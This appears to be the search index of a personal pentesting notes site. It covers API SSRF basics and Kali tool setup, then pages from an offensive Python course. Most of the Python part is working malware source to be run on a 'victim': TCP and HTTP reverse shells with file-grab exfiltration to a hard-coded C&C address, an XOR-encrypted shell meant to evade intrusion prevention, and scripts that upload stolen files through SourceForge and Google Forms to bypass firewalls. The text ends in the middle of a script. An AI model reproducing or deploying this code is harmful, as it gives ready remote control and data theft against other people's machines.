                                  ","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/#ssrf-types","title":"SSRF types","text":"","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/#in-band-ssrf","title":"In-Band SSRF","text":"

You supply a URL as the attack. The request is sent, and the content of your supplied URL is displayed back to you in the response.

                                  A possible endpoint:

                                  {\n    \"inventory\":\"http://store.com/api/v3/inventory/item/12345\"\n}\n

                                  SSRF code:

                                  {\n    \"inventory\":\"http://maliciousserver.com\"\n}\n
                                  ","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/#blind-ssrf","title":"Blind SSRF","text":"

It's similar to the In-Band attack, but in this case the response gives us no indication that the server is vulnerable:

                                  HTTP/1.1 200 OK  \nheaders...  \n{}\n

But there is a way to test it: Burp Suite Pro has a great tool called Burp Collaborator. Collaborator can be leveraged to set up a web server that provides us with the details of any requests made to our random URL.

                                  ","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/#tools-to-test-blind-ssrf","title":"Tools to test Blind SSRF","text":"

                                  Free:

                                  • https://webhook.site
                                  • http://pingb.in/
                                  • https://requestbin.com/
                                  • https://canarytokens.org/

                                  Paid:

                                  • Burp Collaborator.
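
With any of these services the test is the same: plant a unique canary URL and watch the service's dashboard for a hit. A minimal sketch, assuming a webhook.site URL you created beforehand:

import requests\n\nTARGET = 'http://store.com/api/v3/item' # hypothetical vulnerable endpoint\nCANARY = 'https://webhook.site/<your-token>' # replace with your unique canary URL\n\nr = requests.post(TARGET, json={'inventory': CANARY})\nprint(r.status_code) # the response itself tells us nothing...\n# ...but a request logged on webhook.site proves the server fetched our URL (blind SSRF)\n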
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/","title":"Setting up the environment","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups

For this course, I'll use a Kali machine installed on VirtualBox. I downloaded the latest .ova version, 2022.3.

                                  After that, follow these steps:

                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#1-install-a-kali-ova-on-virtualbox","title":"1. Install a kali ova on VirtualBox","text":"

                                  For this course I've downloaded a Kali .ova machine. I will be using VirtualBox and I will modify these elements in the ova installation:

                                  • 4GB RAM
                                  • Bridge mode Interface
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#2-update-our-system","title":"2. Update our system","text":"
sudo apt update -y\nsudo apt upgrade -y\nsudo apt dist-upgrade -y\n

                                  Also, update credentials:

sudo passwd kali    # enter a new, more complex password\nsudo useradd -m hapihacker\nsudo usermod -a -G sudo hapihacker\nsudo chsh -s /bin/zsh hapihacker\n
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#3-install-burp-suite-and-make-sure-that-is-up-to-date","title":"3. Install Burp Suite and make sure that is up-to-date.","text":"
                                  sudo apt-get install burpsuite -y\n
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#4-adding-extension-authorize-extension-to-burpsuite-this-will-require-to-have-jython-installed","title":"4. Adding extension Authorize extension to BurpSuite: this will require to have Jython installed.","text":"
                                  1. Download jython from: https://www.jython.org/download.html and add the .jar file to the Extender Options.
                                  2. Under the Extender BApp Store search for Autorize and install the extension.
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#5-install-foxy-proxy-in-firefox-to-proxy-the-traffic-to-burpsuite-and-postman-once-intalled-well-set-up-manually-two-proxies","title":"5. Install Foxy-proxy in Firefox to proxy the traffic to BurpSuite and Postman. Once intalled, we'll set up manually two proxies","text":"
                                  1. Postman - 127.0.0.1 - 5555
                                  2. BurpSuite - 127.0.0.1 - 8080.

                                  Download BurpSuite certificate and have it installed in Firefox.

                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#6-mitmweb-certificate-setup","title":"6. MITMweb certificate setup","text":"
1. Run mitmweb from the terminal:
                                  mitmweb\n

                                  We need to make sure that Burpsuite is stopped, since mitmweb is also going to use port 8080.

2. Activate FoxyProxy in Firefox to send traffic to the 8080 proxy (now served by mitmweb).

3. Download mitmproxy-ca-cert.pem from mitm.it (in Firefox) and have it installed in Firefox.

                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#7-install-postman","title":"7. Install Postman","text":"
sudo wget https://dl.pstmn.io/download/latest/linux64 -O postman-linux-x64.tar.gz && sudo tar -xvzf postman-linux-x64.tar.gz -C /opt && sudo ln -s /opt/Postman/Postman /usr/bin/postman\n
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#8-install-mitmproxy2swagger","title":"8. Install mitmproxy2swagger","text":"
                                  cd /opt\nsudo pip3 install mitmproxy2swagger\n
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#9-install-git","title":"9. Install git","text":"
                                  cd /opt\nsudo apt-get install git\n
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#10-install-docker","title":"10. Install docker","text":"
                                  cd /opt\nsudo apt-get install docker.io docker-compose\n
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#11-install-go","title":"11. Install Go","text":"
cd /opt\nsudo apt install golang-go\n
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#12-install-json-web-token-toolkit-v2","title":"12. Install JSON Web Token Toolkit v2","text":"
cd /opt\nsudo git clone https://github.com/ticarpi/jwt_tool\ncd jwt_tool\npython3 -m pip install termcolor cprint pycryptodomex requests\n\n# Optional: make an alias for jwt_tool.py\nsudo chmod +x jwt_tool.py\nsudo ln -s /opt/jwt_tool/jwt_tool.py /usr/bin/jwt_tool\n
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#13-install-kiterunner","title":"13. Install Kiterunner","text":"
                                  sudo git clone https://github.com/assetnote/kiterunner.git\ncd kiterunner\nsudo make build\nsudo ln -s /opt/kiterunner/dist/kr /usr/bin/kr\n
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#14-install-arjun","title":"14. Install Arjun","text":"

                                  More about arjun.

sudo git clone https://github.com/s0md3v/Arjun.git\n
                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#15-install-owasp-zap","title":"15. Install OWASP ZAP","text":"
                                  sudo apt install zaproxy\n

                                  Run ZAP and open the \"Manage Add-ons\" option and make sure that the add-on \"OpenAPI Support\" is marked to be updated.

                                  ","tags":["api"]},{"location":"hackingapis/setting-up-kali/#16-have-these-useful-wordlist-api-oriented","title":"16. Have these useful wordlist API oriented","text":"
# SecLists https://github.com/danielmiessler/SecLists\nsudo wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \\\n&& sudo unzip SecList.zip \\\n&& sudo rm -f SecList.zip\n\n# Hacking-APIs https://github.com/hAPI-hacker/Hacking-APIs\nsudo wget -c https://github.com/hAPI-hacker/Hacking-APIs/archive/refs/heads/main.zip -O HackingAPIs.zip \\\n&& sudo unzip HackingAPIs.zip \\\n&& sudo rm -f HackingAPIs.zip\n
                                  ","tags":["api"]},{"location":"python/bypassing-ips-with-handmade-xor-encryption/","title":"Bypassing IPS with handmade XOR Encryption","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
• Tuning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
• Using a Dynamic DNS instead of your bare attacker public IP.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
• Hijack the Internet Explorer process to bypass a host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
• Malware and cryptography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
• Password Hijacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.

The idea is to encrypt our traffic to evade network analyzers and intrusion prevention sensors. SSL or SSH is not recommended here, since Next Generation Firewalls have the ability to decrypt them and pass the traffic as plain text to the IPS, where it will be recognized.

• Create a 1 KB secret key (matching the socket buffer size) and XOR it with the message to encrypt it:
# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\n# The random and string libraries are used to generate a random string with flexible criteria\nimport string\nimport random\n\n\n# Random Key Generator\nkey = ''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits + '^!\\$%&/()=?{[]}+~#-_.:,;<>|\\\\') for _ in range(0, 1024))\n\n\nprint(key)\n\nprint (\"\\n\" + \"Key length = \" + str(len(key)))\n\nmessage = 'ipconfig'\nprint(\"Msg: \" + message + '\\n')\n\n\n# Here we define a dedicated function called str_xor. We pass two values to it: the first is the message (s1) that we want to encrypt or decrypt, and the second parameter is the XOR key (s2). Encryption and decryption share one function because the XOR operation is exactly the same both ways; the only difference is that to encrypt we pass the clear-text message, and to decrypt we pass the encrypted message\n\n\ndef str_xor(s1, s2):\n    return \"\".join([chr(ord(c1) ^ ord(c2)) for (c1, c2) in zip(s1,s2)])\n\n\n# First we pair up the characters of the message and the XOR key as tuples >>  for (c1,c2) in zip(s1,s2)\n\n# Next we go through each tuple, converting the characters to integers using the ord function; once converted, we can XOR them  >>  ord(c1) ^ ord(c2)\n\n# Then we convert the result back to a character using the chr function  >>  chr(ord(c1) ^ ord(c2))\n# Last, we merge the resulting characters into a single string using  >>  \"\".join\n\nenc = str_xor(message, key)\n\nprint(\"Encrypted message is \" + \"\\n\" + enc + \"\\n\")\n\ndec = str_xor(enc, key)\nprint(\"Decrypted message is \" + \"\\n\" + dec + \"\\n\")\n

To integrate XOR encryption into this client-side Python script, you can modify it to encrypt and decrypt the communication between the client and the server using the XOR algorithm.

                                  Here is an example of how to modify the script to incorporate XOR encryption:

import string\nimport random\nimport requests\nimport os\nimport subprocess\nimport time\n\n# Random Key Generator\n# NOTE: a key generated randomly on the client alone cannot be known by the server;\n# for end-to-end encrypted control, the same key must be shared with the C&C side (e.g. out of band)\nkey = ''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits + '^!\\$%&/()=?{[]}+~#-_.:,;<>|\\\\') for _ in range(0, 1024))\n\n# Define XOR function (works on strings; the same operation encrypts and decrypts)\ndef str_xor(s1, s2):\n    return \"\".join([chr(ord(c1) ^ ord(c2)) for (c1, c2) in zip(s1,s2)])\n\nwhile True:\n    # Send GET request to C&C server to get command\n    req = requests.get('http://192.168.0.152:8080')\n    command = req.text\n\n    # If command is to terminate, break out of loop\n    if 'terminate' in command:\n        break\n\n    # If command is to grab a file and send it to the C&C server\n    elif 'grab' in command:\n        grab, path = command.split(\"*\")\n        if os.path.exists(path):\n            url = \"http://192.168.0.152:8080/store\"\n            filer = {'file': open(path, 'rb')}\n            r = requests.post(url, files=filer)\n        else:\n            post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode())\n\n    # If command is to search for files with a specific extension\n    elif 'search' in command:\n        # Split command into path and file extension\n        command = command[7:] # cut off the first 7 characters; output would be C:\\\\*.pdf\n        path, ext = command.split('*')\n        lists = '' # string where we will append our results\n\n        # Walk through directories and search for files with specified extension\n        for dirpath, dirname, files in os.walk(path):\n            for file in files:\n                if file.endswith(ext):\n                    lists = lists + '\\n' + os.path.join(dirpath, file)\n        requests.post(url='http://192.168.0.152:8080', data=lists)\n\n    # If command is a shell command: decrypt it, execute it, and send the XOR-encrypted output back\n    else:\n        # Decrypt the received command with the XOR key (the server is assumed to send it encrypted)\n        dec = str_xor(command, key)\n\n        # Execute the decrypted command and capture stdout and stderr\n        CMD = subprocess.Popen(dec, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        # str_xor expects strings, so decode the bytes returned by read() before encrypting\n        post_response = requests.post(url='http://192.168.0.152:8080', data=str_xor(CMD.stdout.read().decode(), key))\n        post_response = requests.post(url='http://192.168.0.152:8080', data=str_xor(CMD.stderr.read().decode(), key))\n\n    time.sleep(3)\n
                                  ","tags":["python","python pentesting","scripting","ips","xor encryption"]},{"location":"python/bypassing-next-generation-firewalls/","title":"Bypassing Next Generation Firewalls","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
• Tuning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
• Using a Dynamic DNS instead of your bare attacker public IP.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
• Hijack the Internet Explorer process to bypass a host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
• Malware and cryptography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
• Password Hijacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.

Corporate firewalls (Next Generation Firewalls) can block traffic based on the reputation of the target IP/URL. This means that even once we manage to execute the malicious client-side script on the victim's machine, the next generation firewall might block or defer the connection if the target URL/IP belongs to a vendor-supplied reputation pool and is categorized as low.

                                  To overcome this filter, modern malware is using trusted targets.

                                  ","tags":["python","python pentesting","scripting","bypassing techniques","firewall","bypassing firewall","next generation firewalls"]},{"location":"python/bypassing-next-generation-firewalls/#using-source-forge-for-data-exfiltration","title":"Using Source Forge for data exfiltration","text":"

1. Sign up on SourceForge

                                  You will get credentials for configuring your SFTP agent in step 3.

                                  2. Install filezilla. It will work as our SFTP agent:

                                  sudo apt-get install filezilla\n

                                  3. Configure filezilla and connect.

                                  Host: web.sourceforge.net\nusername: usernameinSourceForge\npassword: passwordinSourceForge\nport: 22\n

                                  4. Install these two python libraries on the victim's machine: paramiko and scp.

                                  pip install paramiko\npip install scp\n

                                  5. Run the script on the victim's machine:

'''\nCaution\n--------\nUsing this script for any malicious purpose is prohibited and against the law. Please read SourceForge terms and conditions carefully. \nUse it at your own risk. \n'''\n\n# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport paramiko\nimport scp\n\n# File Management on SourceForge \n# [+] https://sourceforge.net/p/forge/documentation/File%20Management/\n\n\nssh_client = paramiko.SSHClient() # create an ssh_client instance using the paramiko SSHClient class\n\nssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\nssh_client.connect(\"web.sourceforge.net\", username=\"myusernameatSourceForge\", password=\"PASSWORD HERE\") # Authenticate ourselves to SourceForge. Server, username and password from step 1\nprint (\"[+] Authenticating against web.sourceforge.net\")\n\nscp = scp.SCPClient(ssh_client.get_transport()) # after a successful authentication, the ssh session id is passed into the SCPClient function\n\nscp.put(\"C:/Users/Alex/Desktop/passwords.txt\") # upload a file, for instance passwords.txt\nprint (\"[+] File is uploaded\")\n\nscp.close()\n\nprint(\"[+] Closing the socket\")\n
                                  ","tags":["python","python pentesting","scripting","bypassing techniques","firewall","bypassing firewall","next generation firewalls"]},{"location":"python/bypassing-next-generation-firewalls/#using-google-forms-for-submitting-output","title":"Using Google Forms for submitting output","text":"

                                  1. Create a Google Form with a quick test and copy the link of the survey.

                                  2. Copy the name of the form from the source code of the google form.

                                  3. Paste URL of the survey + name of the form in the script:

                                  '''\nCaution\n--------\nUsing this script for any malicious purpose is prohibited and against the law. Please read Google terms and conditions carefully. \nUse it on your own risk. \n'''\n\n# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\n\nimport requests\n\nurl = 'https://docs.google.com/forms/d/1Ndjnm5YViqIYXyIuoTHsCqW_YfGa-vaaKEahY2cc5cs/formResponse'\n\nform_data = {'entry.1301128713':'Lets see how we can use this, in the next exercise'}\n\nr = requests.post(url, data=form_data)\n\n# Submitting form-encoded data in requests:-\n# http://docs.python-requests.org/en/latest/user/quickstart/#more-complicated-post-requests\n
                                  ","tags":["python","python pentesting","scripting","bypassing techniques","firewall","bypassing firewall","next generation firewalls"]},{"location":"python/bypassing-next-generation-firewalls/#exercise","title":"Exercise","text":"
Try to combine the above ideas (Google Form + Twitter + SourceForge) into a single script and see if you can control your target without direct interaction.\n
                                  ","tags":["python","python pentesting","scripting","bypassing techniques","firewall","bypassing firewall","next generation firewalls"]},{"location":"python/coding-a-data-exfiltration-script-http-shell/","title":"Coding a data exfiltration script for a http shell","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
• Tuning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
• Using a Dynamic DNS instead of your bare attacker public IP.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
• Hijack the Internet Explorer process to bypass a host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
• Malware and cryptography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
• Password Hijacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-data-exfiltration-script-http-shell/#client-side","title":"Client side","text":"

To be run on the victim's computer.

# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport requests\nimport os\nimport subprocess\nimport time\n\nwhile True:\n\n    req = requests.get('http://192.168.0.152:8080')\n    command = req.text\n    if 'terminate' in command:\n        break\n\n\n# Similar to what we did in our TCP reverse shell, we check if the file exists in the first place; if not, we\n# notify our attacker that we are unable to find the file. If the file is there, we will:\n# 1. Append /store to the URL\n# 2. Add a dictionary key called 'file'\n# 3. Let the requests library use the POST method called \"multipart/form-data\" when submitting files\n\n# All of the above points will be used on the server side to distinguish that this POST submits a file, NOT a usual command output. Please see the server script for more details on how we can use these points to get the file\n\n\n    elif 'grab' in command:\n        grab, path = command.split(\"*\")\n        if os.path.exists(path): # check if the file is there\n            url = \"http://192.168.0.152:8080/store\" # Append /store to the URL\n            files = {'file': open(path, 'rb')} # Add a dictionary key called 'file' where the key value is the file itself\n            r = requests.post(url, files=files) # Send the file; behind the scenes, requests uses the POST method called \"multipart/form-data\"\n        else:\n            post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode())\n    else:\n        CMD = subprocess.Popen(command, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read())\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read())\n    time.sleep(3)\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-data-exfiltration-script-http-shell/#server-side","title":"Server side","text":"
# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport http.server\nimport os, cgi\n\nHOST_NAME = '10.0.2.15'\nPORT_NUMBER = 8080\n\nclass MyHandler(http.server.BaseHTTPRequestHandler):\n\n    def do_GET(self):\n\n        command = input(\"Shell> \")\n        self.send_response(200)\n        self.send_header(\"Content-type\", \"text/html\")\n        self.end_headers()\n        self.wfile.write(command.encode())\n\n    def do_POST(self):\n\n        # Here we use the points mentioned on the client side: if \"/store\" is in the URL, then this POST is used for a file transfer, so we parse the POST header; if its value is 'multipart/form-data', we pass the POST parameters to the FieldStorage class. The \"fs\" object contains the values returned from FieldStorage in dictionary fashion.\n\n        if self.path == '/store':\n            try:\n                ctype, pdict = cgi.parse_header(self.headers.get('content-type'))\n                if ctype == 'multipart/form-data':\n                    fs = cgi.FieldStorage(fp=self.rfile, headers = self.headers, environ= {'REQUEST_METHOD': 'POST'})\n                else:\n                    print('[-] Unexpected POST request')\n                fs_up = fs['file'] # Remember, on the client side we submitted the file in dictionary fashion, using the key 'file'\n                with open('/home/kali/place_holder.txt', 'wb') as o: # create a placeholder called 'place_holder.txt' and write the received file into it. After the operation you need to rename this file to the original name, so the extension gets recognized. \n                    print('[+] Writing file ..')\n                    o.write(fs_up.file.read())\n                    self.send_response(200)\n                    self.end_headers()\n            except Exception as e:\n                print(e)\n            return\n        self.send_response(200)\n        self.end_headers()\n        length = int(self.headers['Content-length'])\n        postVar = self.rfile.read(length)\n        print(postVar.decode())\n\nif __name__ == '__main__':\n    server_class = http.server.HTTPServer\n    httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)\n    try:\n        httpd.serve_forever()\n    except KeyboardInterrupt:\n        print ('[!] Server is terminated')\n        httpd.server_close()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-low-level-data-exfiltration-tcp/","title":"Coding a low level data exfiltration - TCP connection","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
• Tuning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
• Using a Dynamic DNS instead of your bare attacker public IP.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
• Hijack the Internet Explorer process to bypass a host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
• Malware and cryptography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
• Password Hijacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-low-level-data-exfiltration-tcp/#client","title":"Client","text":"

To be run on the victim's computer.

# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\nimport socket\nimport subprocess\nimport os\n\n\n# In the transfer function, we first check if the file exists in the first place; if not, we notify the attacker.\n# Otherwise, we create a loop where on each iteration we read 1 KB of the file and send it. Since the\n# server has no idea about the end of the file, we add a tag called 'DONE' to address this issue; finally we close the file\ndef transfer(s, path):\n    if os.path.exists(path):\n        f = open(path, 'rb')\n        packet = f.read(1024)\n        while len(packet) > 0:\n            s.send(packet)\n            packet = f.read(1024)\n        s.send('DONE'.encode())\n        f.close()\n    else:\n        s.send('File not found'.encode())\ndef connecting():\n    s = socket.socket()\n    s.connect((\"10.0.2.15\", 8080))\n\n    while True:\n        command = s.recv(1024)\n\n        if 'terminate' in command.decode():\n            s.close()\n            break\n\n\n# If we receive the grab keyword from the attacker, it indicates a file transfer operation, so we split the received command into two parts; the second part, which we are interested in, contains the file path, so we store it in a variable called path and pass it to the transfer function\n\n# Remember the formula is  grab*<File Path>\n# Absolute path example:  grab*C:\\\\Users\\\\Hussam\\\\Desktop\\\\photo.jpeg\n        elif 'grab' in command.decode():\n            grab, path = command.decode().split(\"*\")\n            try:\n                transfer(s, path)\n            except:\n                pass\n        else:\n            CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n            s.send(CMD.stderr.read())\n            s.send(CMD.stdout.read())\ndef main():\n    connecting()\nmain()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-low-level-data-exfiltration-tcp/#server","title":"Server","text":"

                                  To be run on attacker's computer.

# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\nimport os\nimport socket\n\ndef transfer(conn, command):\n    conn.send(command.encode())\n    grab, path = command.split(\"*\")\n    f = open('/home/kali/'+path, 'wb')\n    while True:\n        bits = conn.recv(2048)\n        if bits.endswith('DONE'.encode()):\n            f.write(bits[:-4]) # Write those last received bits without the word 'DONE' \n            f.close()\n            print ('[+] Transfer completed ')\n            break\n        if 'File not found'.encode() in bits:\n            print ('[-] Unable to find the file')\n            break\n        f.write(bits)\ndef connecting():\n    s = socket.socket()\n    s.bind((\"10.0.2.15\", 8080))\n    s.listen(1)\n    print('[+] Listening for incoming TCP connections on port 8080')\n    conn, addr = s.accept()\n    print('[+] We got a connection from', addr)\n\n    while True:\n        command = input(\"Shell> \")\n        if 'terminate' in command:\n            conn.send('terminate'.encode())\n            break\n        elif 'grab' in command:\n            transfer(conn, command)\n        else:\n            conn.send(command.encode())\n            print(conn.recv(1024).decode())\ndef main():\n    connecting()\nmain()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-low-level-data-exfiltration-tcp/#using-pyinstaller","title":"Using pyinstaller","text":"

                                  See pyinstaller.

                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-reverse-shell-that-scans-ports/","title":"Coding a reverse shell that scans ports","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
• Tuning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
• Using a Dynamic DNS instead of your bare attacker public IP.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
• Hijack the Internet Explorer process to bypass a host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
• Malware and cryptography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
• Password Hijacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting","reverse shell","port scanner"]},{"location":"python/coding-a-reverse-shell-that-scans-ports/#client-side","title":"Client side","text":"

                                  To be run on the victim's machine.

# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nimport os\nimport socket\nimport subprocess\n\ndef transfer(s, path):\n    if os.path.exists(path):\n        f = open(path, 'rb')\n        packet = f.read(1024)\n        while packet:\n            s.send(packet)\n            packet = f.read(1024)\n        s.send('DONE'.encode())\n        f.close()\n\ndef scanner(s, ip, ports):\n    scan_result = '' # scan_result is a string that accumulates our scanning results\n    for port in ports.split(','):\n        try: # we try to make a connection using the socket library for EACH one of these ports\n            sock = socket.socket()\n# connect_ex returns 0 if the operation succeeded; success here means the connection happened, which means the port is open. Otherwise the port is closed or the host is unreachable in the first place.\n            output = sock.connect_ex((ip, int(port)))\n            if output == 0:\n                scan_result = scan_result + \"[+] Port \" + port + \" is opened\" + \"\\n\"\n            else:\n                scan_result = scan_result + \"[-] Port \" + port + \" is closed\" + \"\\n\"\n            sock.close()\n        except Exception as e:\n            pass\n    s.send(scan_result.encode())\ndef connect():\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect(('192.168.0.152', 8080))\n    while True:\n        command = s.recv(1024)\n        if 'terminate' in command.decode():\n            s.close()\n            break\n        elif 'grab' in command.decode():\n            grab, path = command.decode().split('*')\n            try:\n                transfer(s, path)\n            except Exception as e: # name the exception so we can report it back (the original bare except referenced an undefined e)\n                s.send(str(e).encode())\n                pass\n\n        elif 'scan' in command.decode(): # syntax: scan 10.10.10.100:22,80\n            command = command[5:].decode() # slice off the leading 5 characters ('scan ')\n            ip, ports = command.split(':')\n            scanner(s, ip, ports)\n        else:\n            CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, 